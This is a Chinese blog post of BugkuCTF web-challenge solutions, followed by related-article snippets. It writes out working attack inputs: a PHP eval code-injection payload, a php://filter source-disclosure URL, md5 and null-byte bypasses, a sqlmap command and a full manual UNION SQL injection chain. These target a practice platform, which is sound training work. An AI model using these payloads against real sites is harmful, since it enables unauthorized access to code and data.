BugkuCTF练习记录(一)WEB篇

最新推荐文章于 2022-08-26 21:30:00 发布
最新推荐文章于 2022-08-26 21:30:00 发布
阅读量947 收藏 4
点赞数
文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40912783/article/details/82722221
版权

WEB2

F12 控制台  找到flag

计算器

输入结果发现只能输入一位  F12找到 input属性 修改maxlength的值

WEB 基础$_GET

查看代码 URL中输入?what=flag 

WEB 基础$_POST

查看代码 用Firefox 的 hackbar 插件 post what=flag 

矛盾

函数 is_numeric() 检测变量是否为数字或数字字符串

用科学计数法构造数字1 

或者使用%00截断 ?num=1%00

WEB3

打开后发现一直弹窗 直接查看源码 在最后一行发现unicode码 解码获得flag

域名解析

题目要求把 flag.bugku.com 解析到 120.24.86.145 

打开C:\WINDOWS\system32\drivers\etc\hosts

添加 flag.bugku.com  120.24.86.145   用浏览器打开flag.bugku.com获得flag

WEB5

查看网页源码发现 js代码  粘贴进F12控制台运行 获得flag

你必须让它停下

进入网页发现页面一直在刷新 结合题目名字 用bp抓包 Sent to Repeater之后go几次就发现了flag

头等舱

打开网页发现什么也没有 网页的隐藏属性  用bp抓包 go一下 就发现了flag

本地包含

方法(一)

分析代码发现 文件存在本地

构造playload      /index.php?hello=1);print_r(file("flag.php")  就相当于eval( "1);print_r(file("./flag.php%22")")

方法(二)

直接给hello赋值 index.php?hello=file_get_contents(%27flag.php%27) 按F12  获得flag

变量1

通过分析代码想到 本地文件包含 eval()函数构造playload 但是 由于 过滤了符号 所以无法构造出来 

于是想到使用$GLOBALS超全局变量 用数组方式查看flag1.php

playload   ?args=GLOBALS

web-4

查看源码 发现var1和var2 是url编码   解码后根据代码公式拼接 输入后获得flag

flag在index里

点击链接发现url变成了http://120.24.86.145:8005/post/index.php?file=show.php

想到利用php://filter漏洞读出index源代码

构造payload   http://120.24.86.145:8005/post/index.php?file=php://filter/read/convert.base64-encode/resource=index.php

得到一段base64编码内容解码后获得flag

输入密码查看flag

 直接burpsuit暴力破解

备份是个好习惯

打开网页 发现一堆编码 试过所有解码方式均无效 先放一边 根据题目提示备份文件 *.bak *.swp是一般备份文件后缀名

试着找这两个文件  访问http://120.24.86.145:8002/web16/index.php.bak下载到备份文件

另外也可以用脚本扫描发现内部文件地址 https://git.coding.net/yihangwang/SourceLeakHacker.git 脚本源码

打开bak文件分析源码 ①str_replace函数 清空key字符 可以使用双写绕过 kekeyy

②熟悉的md5问题 方法1 利用数组绕过 kekeyy1[]=a& kekeyy2[]=b 方法二  kekeyy1=240610708&kekeyy2=QNKCDZO

学成成绩查询

 方法① sqlmap大法  :首先随便输入个数Submit 抓包 然后copy to file 以文本格式存在本地 

开始跑 sqlmap : python sqlmap.py -r"D:\123txt" -p id --current-db

tips :-p 指定参数 -r 加载一个文件 --current-db 获取当前数据库

然后按顺序依次爆破 数据库—>表名—>列名—>字段内容  顺利获得flag

方法② 手工注入 

随便输入一个数 发现有三个显示位 构造playload:?id=1' union select 1,2,3,4#

然后爆出数据库名 ?id=1' union select 1,2,3,database()#    数据库名  skctf_flag

?id=1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='skctf_flag'#

得到表名字  fl4g  然后查fl4g表的列名:

?id=1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema='skctf_flag' and table_name ='fl4g'#

得到列名字是skctf_flag与数据库名字重复了 最后查询skctf_flag列中字段内容

?id=1' union select 1,2,3,group_concat(skctf_flag) from skctf_flag.fl4g#   得到flag

 

 

SIIVIBA
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于BugkuCTFweb题目的总结
weixin_44149478的博客
02-25 1271
web2 很简单的一道题,进去直接f12查看源码,发现flag。 flag KEY{Web-2-bugKssNNikls9100} 计算器 进去发现是一个计算题,算出答案后输入,发现只能输入一位,查看源码,发现有一条“maxlength=1”,将1改为2或直接删掉,输入计算题答案,得到flag。 flag{CTF-bugku-0032} web基础$_GET f12,发现源码是一个条件输出的代码,...
bugku web 系列题目思路总结(五)
yukinorong的博客
08-09 470
bugku insert into 注入 PHP explode() 将字符串打散为数组。根据第一个参数分割。 一个基于时间的盲注代码。 # -*- coding:utf-8 -*- import requests import sys # 基于时间的盲注,过滤了逗号 , sql = "127.0.0.1'+(select case when substr((select flag from fl...
bugkuCTF-练习平台
qq_36676979的博客
03-08 5308
web 1.web2 这题查看源代码即可,火狐浏览器f12,查看器。 2.计算器 f12查看器,找到下面这行: <input type="text" class="input" maxlength="1"> 将maxlength改成位数比结果的的数,就可以输入了。 3.web基础$_GET 这个确实是基础,在get请求时,传入参数形式是在url后面加 ?参数=值。多个参数用 ?参...
BugkuCTF - 练习平台 - 代码审计——Writeup
今天吃什么
02-15 607
1.extract变量覆盖 白话代码: 一个名叫flag的变量等于‘xxx’ 将通过GET传过来的数组转为一个名为数组名,值为数组值的变量(如果新的变量和已有变量重名,会将已有变量替换) 如果存在一个名叫shiyan的字符串 将flag变量的值赋给名为content变量 如果变量shiyan和变量content的值相同, 就输出flag的值 否则就输出Oh,no 因为extract()会把符号表...
bugku web知识点总结(1-12)
yifujiadeng的博客
04-16 277
bugku web总结(1-12) web1: ctrl+u,查看页面源码,直接能看到flag,没啥好说的 web2: 让你做三位的算数题,但是答案只让你填一位,好在是前端验证,我们可以直接改,f12打开控制台,源码里有个maxlength变量,初始值设了个1,我们改成3,就可以正常输入了,输入正确答案,flag就有了 web3: 打开之后,给了一串源码 $what=$_GET['what']; //接受post过来的参数what,存到what里 echo $what; //打印 if($wha
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
apachecn#apachecn-ctf-wiki#BugkuCTF-WEB解题记录-11-15_weixin_3069946
07-25
BugkuCTF WEB解题记录 11-15_weixin_30699463的博客-CSDN博客来源:
BugKuCTF(CTF-练习平台)——Crypto-ok
Ifish的博客
01-23 2901
题目描述: 题目解答: 1)思路:看到题目,说明是Ook编码(这里分享13种不常见的编码http://news.mydrivers.com/1/190/190926.htm),在网址http://tool.bugku.com/brainfuck/中解密 2)解密: 故flag为:flag{ok-ctf-1234-admin} ...
BugkuCTF ---游戏过关 writeup
weixin_30813225的博客
10-11 152
下载程序后发现是输入1-8数字中的一位 至于怎么玩,我到现在都没弄懂 不多说,直接拖入Ollydbg 搜索 分析了一下字符串,发现有一个显示flag的字符串 双击过去看看,发现类似于一个函数。 接下来的思路就很简单了,分析程序输入数字后怎么判断的,在到跳转点上修改跳转到这个flag的函数里面去 经过反复断点调试 最终找到了输入%d 在此处下...
bugku ctf web篇(一)
最新发布
weixin_51387754的博客
08-26 406
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯” 。 ...
Bugku CTF 题目解析 (1-10题)
半夜好饿的博客
09-28 1万+
写在前面的话: 这里只是记录一些自己的解题思路,或者一些有关解题的乱七八糟的东西,自己是刚零基础接触这方面的东西,所以有表述不当的地方请包容,在此谢过! 1、web2 点开网址后: 解题思路:F12 打开 开发者工具看看,可以看到需要寻找的flag。 将其复制到提交框即可。 flag: KEY{Web-2-bugKssNNikls9100} 2、计算器 点开网址后: 解题思路:先提交答案...
Bugku web基础题(get 、post)
wssmiss的博客
03-01 1518
web基础get: web基础post: burp抓包,改包,报头改为POST,结尾加上参数what=flag 矛盾: 不是数字则输出,进入下一个if判断,是1才输出flag。利用php的特点,输入1a,1b,1c 。。。 再判断是否为数字时,不是数字,与1比较时 是 1 域名解析: 首先在终端需要管理员权限 进入/etc/hosts 修改映射 打开浏览器拿flag 你必须让他停下: 查...
CTF之Bugku 变量1
weixin_41607190的博客
10-04 287
原理:利用GET方式传进去的值,再利用eval()函数的漏洞执行,但实际上这道题关键是读懂这句代码eval(“var_dump($$args);”); 我们传进去的$args又作为一个新的变量放在var_dump()函数中执行。 再根据题目意思,我们把PHP的九大全局变量放进去 发现args=GLOBALS时,flag出现了 ...
BugkuCTF web
weixin_45689999的博客
01-19 760
1.web2 先打开F12看看,很容易发现在注释里面有flag。 把flag后面内容输入即可。 2.计算器 发现是一道及其简单的计算题(要是手上没有计算器有些题比较难算的话,可以点击题目换一道蛤,但是怎么换答案都是两位数以上的),输入答案,发现只能输入一位数,打开F12 发现他可输入字符长度为1,双击修改成10等位数,再输入正确答案,flag就出现了。 3.web基础-GET变量参考以下网址了解_...
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 5905
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
BugkuCTF –备份是个好习惯
热门推荐
超人学飞的日子
06-05 2万+
在做到Bugku的一道题目时,感觉知识点有些多,这里总结一下。题目连接http://120.24.86.145:8002/web16/打开界面只有这一串字符串尝试各种解密解码格式都没有效果,可以观察到整个字符串是d41d8cd98f00b204e9800998ecf8427e的两段重复,其实是MD5加密,最后再揭晓。那现在怎么办呢,按照题目  备份是个好习惯,是让我们寻找  .bak文件的,也就是...
Bugku CTF杂项实战:远程木马、Web漏洞与神秘图片解析
本次杂项题目练习(六)包含一系列针对IT安全和编程技能的挑战,涉及网络安全、漏洞利用、密码学、数据恢复以及图像处理等多个方面。以下是各题目的详细知识点解析: 1. **远控木马**:在应急响应场景中,分析远控...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值